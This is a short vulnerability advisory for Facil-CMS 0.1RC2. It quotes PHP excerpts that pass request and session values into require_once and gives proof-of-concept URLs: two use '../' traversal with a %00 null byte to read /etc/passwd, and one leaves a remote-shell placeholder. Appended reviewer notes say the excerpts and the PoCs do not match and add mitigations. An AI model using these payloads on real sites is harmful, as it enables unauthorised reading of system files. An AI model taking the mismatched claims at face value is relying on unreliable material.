########################################################
Facil-CMS (LFI/RFI) Vulnerability
########################################################

[+]Title : Facil-CMS Multiple Vulnerabilities
[+]Version: 0.1RC2
[+]Download: http://sourceforge.net/projects/facil-cms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thanks To: all friends

########################################################

-=[ Vuln C0de ]=-

(The excerpts below are abridged: closing braces and some branches are not shown, so the brace structure is incomplete as quoted.)

***********************

[-]facil-cms/index.php

require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
$config = new facilConfig();
$utils = new facilUtils();
if($utils->is_module($config->getSiteIndex()))
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');

***********************

[-]facil-cms/modules.php

require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
if($_POST['modload'] && !eregi("/", $_POST['modload'])) {
$_MODLOAD = trim($_POST['modload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload'])) {
$FILELOAD = trim($_POST['fileload']);
$_MODLOAD = false;
$FILELOAD = false;
if($_POST['admload'] &&!eregi("/", $_POST['admload'])) {
$_ADMLOAD = trim($_POST['admload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
$_ADMLOAD = false;
$FILELOAD = false;
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');

*******************

[-]facil-cms/includes/facil-settings.php

if(!isset($_SESSION['FACIL_LANGUAGE'])) {
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
}
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . 
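'/themeFacil.class.php');

*******************

-=[ Proof Of Concept ]=-

http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00

Similar reference: http://www.exploit-db.com/exploits/5792

http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00

http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]

-=[ Reviewer notes ]=-

[*] The quoted modules.php reads modload, fileload and admload from $_POST and discards any value containing "/", while the first PoC passes modload in the query string with a slash-based path. The excerpt and the PoC do not agree as written; confirm against the actual 0.1RC2 source before using this advisory for triage.

[*] getSiteIndex() is a method of facilConfig and FACIL_THEME is read from $_SESSION. Nothing in the excerpts shows either value being taken from the request, so the second and third PoCs would only apply if some other code path (not shown here) copies request variables into them.

[*] The %00 suffix relies on a PHP version that still truncates filesystem paths at a null byte (rejected since PHP 5.3.4), and remote inclusion additionally needs allow_url_include to be enabled.

[*] Mitigation: never concatenate request or session values into require_once. Resolve module, theme and language names against an allowlist of installed directories (or a strict pattern such as ^[A-Za-z0-9_-]+$), replace the single-character eregi("/") denylist (eregi is removed in PHP 7), and keep allow_url_include off.

[*] Detection: review web server logs for "../" sequences or "%00" in requests to modules.php, index.php and includes/facil-settings.php.

########################################################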